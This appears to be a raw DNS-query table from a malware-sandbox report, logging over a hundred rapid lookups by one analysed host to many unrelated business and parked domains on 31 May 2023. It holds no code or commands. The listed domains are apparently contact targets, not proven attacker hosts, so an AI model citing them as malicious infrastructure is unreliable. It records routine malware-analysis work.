                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.757770061 CEST8.8.8.8192.168.2.30xe462No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.763309956 CEST8.8.8.8192.168.2.30x8021Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.793121099 CEST8.8.8.8192.168.2.30xb176Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.871063948 CEST8.8.8.8192.168.2.30x9f75No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.888818979 CEST8.8.8.8192.168.2.30xe08Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.923314095 CEST8.8.8.8192.168.2.30x6c48No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.974445105 CEST8.8.8.8192.168.2.30x9783No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.008805990 CEST8.8.8.8192.168.2.30x2c06No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.008805990 CEST8.8.8.8192.168.2.30x2c06No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.021363020 CEST8.8.8.8192.168.2.30x428No error (0)cpmteam.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.021363020 CEST8.8.8.8192.168.2.30x428No error (0)cpmteam.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.059235096 CEST8.8.8.8192.168.2.30xadb9No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.059235096 CEST8.8.8.8192.168.2.30xadb9No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.079488993 CEST8.8.8.8192.168.2.30xb9e5Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.085459948 CEST8.8.8.8192.168.2.30x81d6No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.085459948 CEST8.8.8.8192.168.2.30x81d6No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.095127106 CEST8.8.8.8192.168.2.30x1060Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.137078047 CEST8.8.8.8192.168.2.30xa092Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.147099018 CEST8.8.8.8192.168.2.30x86d2Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.151109934 CEST8.8.8.8192.168.2.30xce3eNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.248886108 CEST8.8.8.8192.168.2.30x17a0No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.256148100 CEST8.8.8.8192.168.2.30xea9bServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.259391069 CEST8.8.8.8192.168.2.30xa042Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.303158998 CEST8.8.8.8192.168.2.30x5770No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.306715965 CEST8.8.8.8192.168.2.30x8cf4Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.327723026 CEST8.8.8.8192.168.2.30xa1faNo error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.327723026 CEST8.8.8.8192.168.2.30xa1faNo error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.348462105 CEST8.8.8.8192.168.2.30xdf50No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.368201971 CEST8.8.8.8192.168.2.30x4c82No error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.397344112 CEST8.8.8.8192.168.2.30x7d97No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.411350012 CEST8.8.8.8192.168.2.30x2831No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.476171017 CEST8.8.8.8192.168.2.30xc6bcNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.477747917 CEST8.8.8.8192.168.2.30x72cbNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.477747917 CEST8.8.8.8192.168.2.30x72cbNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.522882938 CEST8.8.8.8192.168.2.30x75eeNo error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.564618111 CEST8.8.8.8192.168.2.30xe7f4No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.584599972 CEST8.8.8.8192.168.2.30x6494No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.593426943 CEST8.8.8.8192.168.2.30x5b56No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.593734980 CEST8.8.8.8192.168.2.30xfc20No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.599498987 CEST8.8.8.8192.168.2.30xe4e9Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.599538088 CEST8.8.8.8192.168.2.30x8021Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.626441002 CEST8.8.8.8192.168.2.30x3fbcNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.638941050 CEST8.8.8.8192.168.2.30x7ebeNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.638941050 CEST8.8.8.8192.168.2.30x7ebeNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.638941050 CEST8.8.8.8192.168.2.30x7ebeNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.640480995 CEST8.8.8.8192.168.2.30x6f65No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.682415962 CEST8.8.8.8192.168.2.30xb4dcName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.688888073 CEST8.8.8.8192.168.2.30x53d1No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.713376999 CEST8.8.8.8192.168.2.30x5a9fServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.756690025 CEST8.8.8.8192.168.2.30x27f4Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.791901112 CEST8.8.8.8192.168.2.30x8021Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.855521917 CEST8.8.8.8192.168.2.30x85d0No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.856317043 CEST8.8.8.8192.168.2.30x4181Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.856925011 CEST8.8.8.8192.168.2.30x14dfNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.879034996 CEST8.8.8.8192.168.2.30x803No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.916577101 CEST8.8.8.8192.168.2.30x9284No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.916577101 CEST8.8.8.8192.168.2.30x9284No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:05.941349983 CEST8.8.8.8192.168.2.30x4871No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.036166906 CEST8.8.8.8192.168.2.30x1a75No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.036166906 CEST8.8.8.8192.168.2.30x1a75No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.094222069 CEST8.8.8.8192.168.2.30x2ff8No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.094222069 CEST8.8.8.8192.168.2.30x2ff8No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.094222069 CEST8.8.8.8192.168.2.30x2ff8No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.094222069 CEST8.8.8.8192.168.2.30x2ff8No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.095312119 CEST8.8.8.8192.168.2.30xf434No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.147749901 CEST8.8.8.8192.168.2.30xa5e6No error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.166821003 CEST8.8.8.8192.168.2.30xf7edNo error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.166821003 CEST8.8.8.8192.168.2.30xf7edNo error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.290451050 CEST8.8.8.8192.168.2.30xbf51No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.290451050 CEST8.8.8.8192.168.2.30xbf51No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.314454079 CEST8.8.8.8192.168.2.30x9022No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.319123983 CEST8.8.8.8192.168.2.30x8e75Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.350528955 CEST8.8.8.8192.168.2.30xdc6aName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.354156971 CEST8.8.8.8192.168.2.30x84ecName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.381582975 CEST8.8.8.8192.168.2.30x69caName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.386956930 CEST8.8.8.8192.168.2.30xa042Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.419104099 CEST8.8.8.8192.168.2.30x5dcNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.515873909 CEST8.8.8.8192.168.2.30xbd77No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.521723032 CEST8.8.8.8192.168.2.30xfc97No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.534745932 CEST8.8.8.8192.168.2.30xbd95No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.584625006 CEST8.8.8.8192.168.2.30xf0acNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.613606930 CEST8.8.8.8192.168.2.30xe4e9Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.645009041 CEST8.8.8.8192.168.2.30xf433No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.654041052 CEST8.8.8.8192.168.2.30x8db1No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.678072929 CEST8.8.8.8192.168.2.30x9026Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.698652029 CEST8.8.8.8192.168.2.30xae8No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.709002018 CEST8.8.8.8192.168.2.30x11e2Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.739562988 CEST8.8.8.8192.168.2.30x4364No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.739957094 CEST8.8.8.8192.168.2.30x32fcName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.770445108 CEST8.8.8.8192.168.2.30x27f4Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.770591974 CEST8.8.8.8192.168.2.30x27f4Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.782320023 CEST8.8.8.8192.168.2.30xf2bfNo error (0)dspears.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.782320023 CEST8.8.8.8192.168.2.30xf2bfNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.782320023 CEST8.8.8.8192.168.2.30xf2bfNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.782320023 CEST8.8.8.8192.168.2.30xf2bfNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.818105936 CEST8.8.8.8192.168.2.30x53afName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.841356039 CEST8.8.8.8192.168.2.30x15f6Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.873128891 CEST8.8.8.8192.168.2.30x5f64Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.908442974 CEST8.8.8.8192.168.2.30x9c8dNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.946516991 CEST8.8.8.8192.168.2.30x7fc8No error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.946516991 CEST8.8.8.8192.168.2.30x7fc8No error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.971308947 CEST8.8.8.8192.168.2.30x4b77No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.979110003 CEST8.8.8.8192.168.2.30x3fc8No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.979110003 CEST8.8.8.8192.168.2.30x3fc8No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:06.986136913 CEST8.8.8.8192.168.2.30xbca9No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.033263922 CEST8.8.8.8192.168.2.30x2a5dNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.134902954 CEST8.8.8.8192.168.2.30xe1a2No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.134902954 CEST8.8.8.8192.168.2.30xe1a2No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.220756054 CEST8.8.8.8192.168.2.30x7ab3No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.257822990 CEST8.8.8.8192.168.2.30x8a91No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.292162895 CEST8.8.8.8192.168.2.30xc673No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.312448978 CEST8.8.8.8192.168.2.30x3857No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.371732950 CEST8.8.8.8192.168.2.30x9c55No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.379807949 CEST8.8.8.8192.168.2.30x6698Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.416137934 CEST8.8.8.8192.168.2.30x8736No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.418056011 CEST8.8.8.8192.168.2.30xea65Server failure (2)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.436917067 CEST8.8.8.8192.168.2.30x44ddNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.478952885 CEST8.8.8.8192.168.2.30x506No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.479532957 CEST8.8.8.8192.168.2.30x673eName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518336058 CEST8.8.8.8192.168.2.30x300dName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518606901 CEST8.8.8.8192.168.2.30xc30cNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518606901 CEST8.8.8.8192.168.2.30xc30cNo error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518606901 CEST8.8.8.8192.168.2.30xc30cNo error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518606901 CEST8.8.8.8192.168.2.30xc30cNo error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.518606901 CEST8.8.8.8192.168.2.30xc30cNo error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.544250965 CEST8.8.8.8192.168.2.30xbe03Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.547324896 CEST8.8.8.8192.168.2.30x8083No error (0)shesfit.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.547324896 CEST8.8.8.8192.168.2.30x8083No error (0)shesfit.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.614661932 CEST8.8.8.8192.168.2.30x5a55No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.628469944 CEST8.8.8.8192.168.2.30xe4e9Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.651179075 CEST8.8.8.8192.168.2.30x432Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.651571035 CEST8.8.8.8192.168.2.30xcb15Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.671689034 CEST8.8.8.8192.168.2.30x5118No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.671689034 CEST8.8.8.8192.168.2.30x5118No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.685348988 CEST8.8.8.8192.168.2.30x2e87No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.708995104 CEST8.8.8.8192.168.2.30xc552No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.717737913 CEST8.8.8.8192.168.2.30x476dNo error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.718468904 CEST8.8.8.8192.168.2.30xe81No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.824194908 CEST8.8.8.8192.168.2.30xb071No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.825994968 CEST8.8.8.8192.168.2.30xecdfNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.825994968 CEST8.8.8.8192.168.2.30xecdfNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.844332933 CEST8.8.8.8192.168.2.30xf3d6No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.901217937 CEST8.8.8.8192.168.2.30xb13cNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.918334961 CEST8.8.8.8192.168.2.30xd135No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.918334961 CEST8.8.8.8192.168.2.30xd135No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.918334961 CEST8.8.8.8192.168.2.30xd135No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.918334961 CEST8.8.8.8192.168.2.30xd135No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:07.955493927 CEST8.8.8.8192.168.2.30x4412No error (0)mjrcpas.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.157495022 CEST8.8.8.8192.168.2.30xd45aNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.157495022 CEST8.8.8.8192.168.2.30xd45aNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.217768908 CEST8.8.8.8192.168.2.30x2a81No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.267275095 CEST8.8.8.8192.168.2.30x8f1bNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.304811001 CEST8.8.8.8192.168.2.30xaa2Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.327497005 CEST8.8.8.8192.168.2.30xbaacNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.329097033 CEST8.8.8.8192.168.2.30x480cNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.400305986 CEST8.8.8.8192.168.2.30xa042Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.408354044 CEST8.8.8.8192.168.2.30x379bNo error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.449107885 CEST8.8.8.8192.168.2.30x5028No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.475498915 CEST8.8.8.8192.168.2.30x6c93No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.522528887 CEST8.8.8.8192.168.2.30xdd49No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:08.522528887 CEST8.8.8.8192.168.2.30xdd49No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
